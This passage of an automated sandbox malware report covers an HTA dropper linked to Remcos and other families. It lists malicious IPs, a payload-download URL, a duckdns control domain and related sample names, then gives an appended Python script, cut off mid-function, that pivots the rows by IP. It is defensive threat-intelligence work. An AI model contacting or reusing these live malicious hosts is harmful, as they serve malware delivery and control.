                                                                                                                                        https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.google.com/chromesuggestionsJchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIFLMEMpowershell.exe, 00000001.00000002.1600493692.0000000007707000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://www.google.com/accounts/serviceloginCasPol.exefalse
                                                                                                                                                high
                                                                                                                                                https://google-ohttp-relay-join.fastly-edge.com/Wkchrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://lens.google.com/v3/upload2chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.google.com/bchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163456123.0000372001540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172416237.0000372001648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163283126.0000372001524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.google.com/2(chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://google-ohttp-relay-join.fastly-edge.com/clchrome.exe, 00000010.00000003.2172805524.0000372001654000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://google-ohttp-relay-query.fastly-edge.com/ndScoringDebugReportingAPI7chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174745448.00003720016FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174303481.00003720016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174077403.00003720016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174226836.00003720016E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://nonexistent.googlezip.net/OfflinePagesPrefetchingForcedOn_OfflinePagesPrefetchingOfflinePagechrome.exe, 00000010.00000003.2129369509.00003720013C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.ebuddy.comCasPol.exefalse
                                                                                                                                                                  high
IP | Domain | Country | ASN | ASN Name | Malicious
94.245.104.56 | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | United Kingdom | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
18.244.18.27 | sb.scorecardresearch.com | United States | 16509 | AMAZON-02US | false
142.215.209.78 | ip.1017.filemail.com | Canada | 32156 | HUMBER-COLLEGECA | false
23.94.171.138 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
239.255.255.250 | unknown | Reserved | unknown | unknown | false
192.227.228.36 | nextnewupdationsforu.duckdns.org | United States | 36352 | AS-COLOCROSSINGUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
172.217.16.193 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557815
Start date and time: 2024-11-18 16:51:18 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 36
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winHTA@69/150@25/9
EGA Information:
• Successful, ratio: 55.6%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 194
• Number of non-executed functions: 262
Cookbook Comments:
• Found application associated with file extension: .hta
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.42.16, 204.79.197.203, 216.58.212.142, 204.79.197.239, 13.107.21.239, 13.107.6.158, 2.19.126.145, 2.19.126.152, 48.209.144.71, 2.23.209.177, 2.23.209.158, 2.23.209.176, 2.23.209.149, 2.23.209.161, 2.23.209.179, 2.23.209.148, 2.23.209.160, 2.23.209.150, 184.28.90.27, 172.205.25.163, 88.221.110.195, 88.221.110.179, 2.23.209.187, 2.23.209.181, 2.23.209.130, 2.23.209.189, 2.23.209.185, 2.23.209.133, 2.23.209.182, 23.38.98.114, 23.38.98.71, 23.38.98.69, 23.38.98.115, 23.38.98.117, 23.38.98.120, 23.38.98.119, 23.38.98.121, 23.38.98.118, 13.74.129.1, 13.107.21.237, 204.79.197.237
• Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, img-s-msn-com.akamaized.net, fs-wildcard.microsoft.com.edgekey.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, prod-agic-ne-9.northeurope.cloudapp.azure.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, wildcardtlu-ssl.azureedge.net, a1834.dscg2.akamai.net, c.bing.com, clients.l.google.com, prod-agic-ne-7.northeurope.cloudapp.azure.com, config.edge.skype.com.trafficmanager.net, c-msn-co
• Execution Graph export aborted for target mshta.exe, PID 7528 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 7628 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7772 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8092 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta
Time | Type | Description
10:52:16 | API Interceptor | 151x Sleep call for process: powershell.exe modified
10:53:32 | API Interceptor | 2x Sleep call for process: svchost.exe modified
10:53:35 | API Interceptor | 3362299x Sleep call for process: CasPol.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
142.215.209.78 | Order_Summary.xls | malicious | Remcos, HTMLPhisher |
142.215.209.78 | kissmegoodthingwhichgivemebestthignswithgirluaremy.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot |
142.215.209.78 | bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer |
142.215.209.78 | Purchase order (1).xls | malicious | HTMLPhisher, Lokibot |
142.215.209.78 | Purchase order (2).xls | malicious | HTMLPhisher, Lokibot |
142.215.209.78 | SAMPLE_PHOTO.js | malicious | AgentTesla |
142.215.209.78 | Document.xla.xlsx | malicious | FormBook, HTMLPhisher |
142.215.209.78 | INQ02010391.vbs | malicious | Snake Keylogger, VIP Keylogger |
142.215.209.78 | Order_Confirmation.xls | malicious | Remcos, HTMLPhisher |
142.215.209.78 | Po docs.xls | malicious | HTMLPhisher, Lokibot |
23.94.171.138 | Order_Summary.xls | malicious | Remcos, HTMLPhisher | 23.94.171.138/329/FRSSDE.txt
23.94.171.138 | Order_Confirmation.xls | malicious | Remcos, HTMLPhisher | 23.94.171.138/121/WRFRTTR.txt
23.94.171.138 | seethebstpricewithbestthinghappingwithgoodnews.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 23.94.171.138/350/WHTGODS.txt
23.94.171.138 | Shipment_details.xls | malicious | Remcos, HTMLPhisher | 23.94.171.138/350/WHTGODS.txt
94.245.104.56 | FRSSDE.exe | malicious | Remcos |
94.245.104.56 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
94.245.104.56 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar |
94.245.104.56 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar |
94.245.104.56 | Unlock_Tool_v2.6.5.exe | malicious | Stealc, Vidar |
94.245.104.56 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar |
94.245.104.56 | file.exe | malicious | Amadey, Stealc, Vidar |
94.245.104.56 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc |
94.245.104.56 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar |
94.245.104.56 | file.exe | malicious | Amadey, Stealc, Vidar |
18.244.18.27 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
18.244.18.27 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar |
18.244.18.27 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc |
18.244.18.27 | file.exe | malicious | LummaC, Amadey, Stealc, Vidar |
18.244.18.27 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
18.244.18.27 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
18.244.18.27 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
18.244.18.27 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
18.244.18.27 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
18.244.18.27 | http://www.drawnames.com/wishlist/add/GeoZyywvK48h1oNNizPuIQ-/W47fz4Y7Ik4eooK-94HN8w- | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip.1017.filemail.com | Order_Summary.xls | malicious | Remcos, HTMLPhisher | 142.215.209.78
ip.1017.filemail.com | kissmegoodthingwhichgivemebestthignswithgirluaremy.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot | 142.215.209.78
ip.1017.filemail.com | bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer | 142.215.209.78
ip.1017.filemail.com | Purchase order (1).xls | malicious | HTMLPhisher, Lokibot | 142.215.209.78
ip.1017.filemail.com | Purchase order (2).xls | malicious | HTMLPhisher, Lokibot | 142.215.209.78
ip.1017.filemail.com | SAMPLE_PHOTO.js | malicious | AgentTesla | 142.215.209.78
ip.1017.filemail.com | Document.xla.xlsx | malicious | FormBook, HTMLPhisher | 142.215.209.78
ip.1017.filemail.com | INQ02010391.vbs | malicious | Snake Keylogger, VIP Keylogger | 142.215.209.78
ip.1017.filemail.com | Order_Confirmation.xls | malicious | Remcos, HTMLPhisher | 142.215.209.78
ip.1017.filemail.com | Po docs.xls | malicious | HTMLPhisher, Lokibot | 142.215.209.78
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | FRSSDE.exe | malicious | Remcos | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | Unlock_Tool_v2.6.5.exe | malicious | Stealc, Vidar | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | file.exe | malicious | Amadey, Stealc, Vidar | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | file.exe | malicious | Amadey, Stealc, Vidar | 94.245.104.56
geoplugin.net | FRSSDE.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | Order_Summary.xls | malicious | Remcos, HTMLPhisher | 178.237.33.50
geoplugin.net | ungziped_file.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbs | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | rBankRemittance_pdf.scr.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | download.exe | malicious | Remcos, XWorm | 178.237.33.50
geoplugin.net | file.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | EIesXTUPI9.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | OrderBJ 02 - JUNMA016118313306,pdf.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | Quotation.exe | malicious | Remcos | 178.237.33.50
sb.scorecardresearch.com | FRSSDE.exe | malicious | Remcos | 18.244.18.27
sb.scorecardresearch.com | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 18.244.18.27
sb.scorecardresearch.com | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 18.244.18.27
sb.scorecardresearch.com | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 3.161.82.127
sb.scorecardresearch.com | Unlock_Tool_v2.6.5.exe | malicious | Stealc, Vidar | 18.244.18.38
sb.scorecardresearch.com | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 18.244.18.38
sb.scorecardresearch.com | file.exe | malicious | Amadey, Stealc, Vidar | 3.161.82.20
sb.scorecardresearch.com | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 18.244.18.122
sb.scorecardresearch.com | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 18.244.18.32
sb.scorecardresearch.com | file.exe | malicious | Amadey, Stealc, Vidar | 18.244.18.38
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSINGUS | FRSSDE.exe | malicious | Remcos | 192.227.228.36
AS-COLOCROSSINGUS | Order_Summary.xls | malicious | Remcos, HTMLPhisher | 192.227.228.36
AS-COLOCROSSINGUS | kissmegoodthingwhichgivemebestthignswithgirluaremy.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot | 192.3.243.136
AS-COLOCROSSINGUS | bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer | 192.3.243.136
AS-COLOCROSSINGUS | Signert kontrakt og faktura.xls | malicious | Unknown | 107.173.4.61
AS-COLOCROSSINGUS | New order.xls | malicious | Unknown | 192.3.220.29
AS-COLOCROSSINGUS | Purchase order (1).xls | malicious | HTMLPhisher, Lokibot |
                                                                                                                                                                                                                              • 192.3.243.136
                                                                                                                                                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                              • 192.3.243.136
                                                                                                                                                                                                                              Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 107.173.4.61
                                                                                                                                                                                                                              New order.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 192.3.220.29
                                                                                                                                                                                                                              AMAZON-02USFRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                              • 18.245.124.3
                                                                                                                                                                                                                              https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 13.32.121.19
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 18.244.18.27
                                                                                                                                                                                                                              https://pzpvsr8w.r.us-west-2.awstrack.me/L0/https:%2F%2Flmmoya.online%2Fcave.html/1/010101933f26e1e0-1115fe0b-5025-44be-8af4-15d6df5c778e-000000/HfxdUzBUygbU0CHkcLEJKW7Wybk=401Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                                                                                              • 13.35.58.71
                                                                                                                                                                                                                              phish_alert_sp1_1.0.0.0(1).emlGet hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                              • 54.231.168.160
                                                                                                                                                                                                                              voi.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 3.69.129.77
                                                                                                                                                                                                                              https://securemail.clearswift.com/registration.html?rrRegcode=7MpnbN82&rrUserId=e5178bc1-efec-4a4c-a756-6d87cb45f84e&enterprise=DVLA&locale=en_US&msgUserId=6bc4168eeb627adaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 35.178.12.160
                                                                                                                                                                                                                              PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                              • 75.2.103.23
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 18.244.18.27
                                                                                                                                                                                                                              Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                              • 13.248.169.48
                                                                                                                                                                                                                              HUMBER-COLLEGECAOrder_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSFRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                              https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 150.171.27.10
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                                                                              https://pzpvsr8w.r.us-west-2.awstrack.me/L0/https:%2F%2Flmmoya.online%2Fcave.html/1/010101933f26e1e0-1115fe0b-5025-44be-8af4-15d6df5c778e-000000/HfxdUzBUygbU0CHkcLEJKW7Wybk=401Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                                                                              phish_alert_sp1_1.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 13.89.178.27
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                                                                              https://lnk.ie/7469O/e=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 23.101.59.196
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0ez30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              https://www.google.co.th/url?q=sf_rand_string_uppercase(33)uQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%20xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%62%65%73%74%73%63%72%65%65%6E%69%6E%67%73%65%72%76%69%63%65%2E%63%6F%6D%2F%77%69%6E%6E%6D%2F%6B%6F%6C%69%6E%6E%2F%6B%6F%6F%6C%2Ftest@gmail.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/kovitz.net%2Fyvbw%2F9424537096/ZGViQG1hcnRpbmpveWNlLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              phish_alert_sp1_1.0.0.0(1).emlGet hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              voi.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              bPRQRIfbbq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              No context
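The context tables above answer "which other analyses touched the same ASN or JA3 fingerprint"; the pivot an analyst actually wants is the reverse one: which context IPs recur across samples that look unrelated (an .hta, an .xls, a .js, a .vbs) and which families they tie together. The following is an added example, not part of the Joe Sandbox report: it parses rows in the flattened form this page renders them in (sample name, the "Get hash" link text, verdict, comma-separated threat names, the "Browse" link text, then a bullet line with the context IP) and groups them by IP. The embedded rows are a subset copied from the tables above; the regular expressions and function names are this example's own.

```python
import re
from collections import defaultdict

# Rows copied from the context tables above, in the flattened form the report
# renders them: "<sample>Get hash<verdict><threat names>Browse" followed by a
# bullet line carrying the context IP. A subset of the page's rows, embedded so
# the script runs offline.
ROWS = """\
FRSSDE.exeGet hashmaliciousRemcosBrowse
• 192.227.228.36
Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
• 192.227.228.36
kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
• 192.3.243.136
Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
• 192.3.243.136
Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
• 107.173.4.61
Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
• 142.215.209.78
SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
• 142.215.209.78
INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
• 142.215.209.78
file.exeGet hashmaliciousLummaCBrowse
• 13.107.246.45
"""

# Sample name is lazy so the first "Get hash" ends it; the verdict vocabulary is
# the one Joe Sandbox uses; everything up to the trailing "Browse" is threat names.
ROW_RE = re.compile(
    r"^(?P<sample>.+?)Get hash(?P<verdict>malicious|suspicious|clean|unknown)"
    r"(?P<threats>.*)Browse$"
)
IP_RE = re.compile(r"^•\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$")


def parse_rows(text: str) -> list[dict]:
    """Turn flattened table text into records of sample, verdict, threats and context IP."""
    records, pending = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m:
            threats = [t.strip() for t in m["threats"].split(",") if t.strip()]
            pending = {"sample": m["sample"], "verdict": m["verdict"], "threats": threats}
            continue
        m = IP_RE.match(line)
        if m and pending:  # the bullet line completes the row started just before it
            records.append({**pending, "ip": m["ip"]})
            pending = None
    return records


def pivot_by_ip(records: list[dict]) -> dict:
    """Group distinct samples and named families by context IP ("Unknown" is not a family)."""
    by_ip = defaultdict(lambda: {"samples": set(), "threats": set()})
    for r in records:
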